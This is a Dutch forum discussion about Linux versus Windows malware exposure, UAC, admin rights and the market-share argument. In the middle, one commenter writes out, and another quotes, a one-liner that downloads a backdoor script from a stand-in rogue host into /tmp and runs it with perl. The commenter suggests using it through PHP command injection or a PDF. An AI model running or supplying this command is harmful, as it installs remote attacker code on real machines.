1 april?

Helaas...

Welke Linux distro is het meest geïnstalleerd bij thuisgebruikers? Ubuntu?

Er zijn er zoveel dat je er gek van wordt.
Mandriva heb ik al eraf geknikkerd en nu zie ik deze http://www.youtube.com/watch?v=YJwXNshjOV0
Ziet er nog dikker uit. Zorin 2.0

Volgens distrowatch.com: Ubuntu op 1 dan Fedora op 2 Mint op 3 en dan OpenSuse,Mandriva en Debian.

In het eerdere bericht was dit toch ook al te lezen. Er wordt gesproken over "aanvallers wel kwetsbare systemen laat overnemen." dan lees ik Windows met slechte userrechten
De meeste (zo wat alle) malware is op windows gericht. Reden zal ik het maar niet over hebben.

Maar dat is toch echt de schuld van de users zelf. Mensen zetten bijvoorbeeld UAC uit in Windows 7 zodat de toestemming niet meer nodig is van de gebruiker om iets te installeren. Ik merk het hier in het netwerk ook. Software van bedrijven(ik zal geen namen noemen) die aanraden om UAC uit te zetten en de gebruiker administrator rechten te geven. Het is compleet een zooitje in de Windows wereld.

Deels mee eens, maar er zijn heel wat mensen die een computer gebruiken terwijl ze geen flauw benul hebben wat dat is, en die gaan gewoon dat soort fouten maken. Maar moeten die dan maar geen computer mogen gebruiken? Da's geen oplossing.

Iets wat mij persoonlijk nogal stoort is een benadering die in Windows heel overheersend is en waar ik in Linux veel minder last van heb (mogelijk deels door hoe ik er zelf mee werk), namelijk dat software heel behulpzaam allerlei initiatieven neemt en er vervolgens aan de gebruiker wordt gevraagd of hij het ermee eens is. Die vragen storen je in waar je mee bezig bent, en het ligt dus voor de hand dat je ze uiteindelijk alleen nog maar geïrriteerd wegdrukt en de keuze om het niet meer terug te laten komen dankbaar gebruikt als die geboden wordt.

Initiatieven horen zo veel mogelijk door de gebruiker genomen te worden. Die kan best leren dat je voor het installeren van nieuwe software een speciale installatiemodus moet activeren (met je wachtwoord) waarin je de installatie kan uitvoeren. Die installatiemodus hoeft helemaal niet pas getriggerd te worden als een programma om die extra rechten vraagt, en die installatiemodus mag wat mij betreft zelfs alleen als direct initiatief van een gebruiker gestart worden, nooit vanuit een applicatie.

Oei, maar dan verwacht ik dat een gebruiker iets kan. Inderdaad, en terecht.

Vroeger konden mensen die het nodig hadden met onmogeljike user interfaces als die van WordStar leren werken. Er is geen enkele reden dat mensen niet zouden kunnen leren dat installatie van nieuwe software een handeling extra nodig heeft, een riskante actie is (je hebt tenslotte ook geleerd om uit te kijken als je de straat oversteekt) en dat het altijd hun eigen initiatief hoort te zijn. Als je leert fietsen moeten die steunwieltjes op een gegeven moment van je fiets af, anders leer je nooit met meer dan een slakkengang bochten te nemen. Als je over straat wandelt wil je niet dat er elke keer dat je te dicht bij de stoeprand komt een bord voor je kop verschijnt dat vraagt of je wilt oversteken. Mensen zijn best in staat om dingen te leren. Maar dan moet je ze wel laten zien hoe het echt werkt, en dat niet onder misplaatste handje-vasthouderige abstractielagen blijven wegmoffelen. Als je gebruikers als infantiel behandelt blijven ze dat ook, en als je fundamentele principes van het systeem wegabstraheert dan blijft het systeem ook abstract. Je moet die principes niet onzichtbaar maken, je moet ze op een begrijpelijke manier presenteren, of betere fundamentele principes bedenken om systemen op te baseren. Maar dat zou revolutionair zijn.

Ik denk dat deze mentaliteit van handjes vasthouden een deel van het probleem is.


Om moedeloos van te worden dat dat nog voorkomt. De UAC-opzet was natuurlijk mede gekozen om dit soort software niet in een klap onbruikbaar te maken, maar ik zou denken dat de leveranciers zo langzamerhand wel tijd hebben gehad om de boodschap binnen te laten komen. Ontwikkelen die nog op Windows ME of zo?

Waarom zou je sudo willen/moeten uitvoeren?

cd /tmp && wget http://www.somerogue.org/backdoor.txt && perl backdoor.txt

Werkt prima voor al die php command injection bugs, waarom zou zoiets hier ook niet kunnen? En als ik het verhaal goed begrepen heb zou het zelfs mogelijk moeten zijn om die 'backdoor.txt' te embedden in de PDF zelf.

Thanks voor de info Duck-man, vooral de bronvermelding.

ubuntu is het meest bekend, maar kubuntu lijkt veel op windows 7

Eens, en ik zou nog wat verder willen gaan.

In artikel 32945 ('Google vindt 20 fouten in Windows- en Linuxkernel') zegt de redactie:
Kernelfouten in Linux zouden vaker voorkomen, toch laten aanvallers die links liggen omdat het besturingssysteem minder gebruikers heeft.

Drie redenen waarom het marktaandeel-argument onzin is en in elk geval niet de hele waarheid:
- Windows-gebruikers kunnen in tegenstelling tot hun linux-collegae geen gebruik maken van gecontroleerde distributiemechanismen voor software van (de meeste) derden. Daardoor lopen Windows-gebruikers meer kans op het binnenhalen van trojans.
- Windows heeft, veel meer dan linux, de neiging om gebruikers te 'helpen' en onbekende code automatisch te starten. Daardoor is de kans dat malafide code actief wordt, op Windows groter dan op linux.
- Veel Windows-gebruikers werken met Admin-rechten doordat veel software anders niet (goed) werkt. Op linux is het veel minder nodig om root-rechten te hebben; de software is meestal zo ingericht dat geen extra rechten nodig zijn. Denk bijvoorbeeld aan de beperkte accounts (zonder shell) waarmee de meeste services onder linux draaien. Zie ook artikel 32899 'Uitschakelen adminrechten verhelpt 90% Windows 7-lekken' op deze site.

Deze drie zaken veranderen niet wanneer linux opeens een marktaandeel zou hebben van bijvoorbeeld 70% en Windows maar 20%. In dat geval zou linux de grootste groep vormen maar is Windows nog steeds makkelijker voor malware. Criminelen richten zich niet per se op de grootste groep maar juist op die groep met de grootste kans van slagen.
Een bewijs daarvoor is dat criminelen zich steeds meer bedienen van 'targeted malware' (www.securecomputing.net.au/Feature/115569,the-rise-of-targeted-malware.aspx), dus malware die niet per se op de grootste groep gebruikers gericht is.

Windows heeft een groot marktaandeel bereikt mede doordat consessies gedaan zijn aan de veiligheid, ten gunste van het gebruikersgemak. Microsoft had betere beveiliging van derden kunnen afdwingen door te zorgen dat software van derden alleen NT-compatible mag heten als die software werkt zonder admin-rechten. En door bijvoorbeeld de webbrowser niet opeens (na Windows 95) volledig in het OS te integreren. De ellende daarvan mag bekend zijn (over keuzes gesproken).

Dan de reactie van Mien Dobbelsteen:
cd /tmp && wget http://www.somerogue.org/backdoor.txt && perl backdoor.txt
Beste Mien, moet de gebruiker dat zelf intypen en dan op Enter drukken?
Of wordt deze computer-instructie vanzelf uitgevoerd, en zoja, hoe dan?

Voor diegenen die nog steeds in het marktaandeel-argument 'geloven' nog enkele gedachtegangen:
www.roughlydrafted.com/2008/04/01/the-unavoidable-malware-myth-why-apple-wont-inherit-microsofts-malware-crown/
www.linuxinsider.com/story/67818.html

Deze instructie wordt vanzelf uitgevoerd. Het hoe en waarom laat ik aan jouw onmetelijke kennis over om te ontdekken.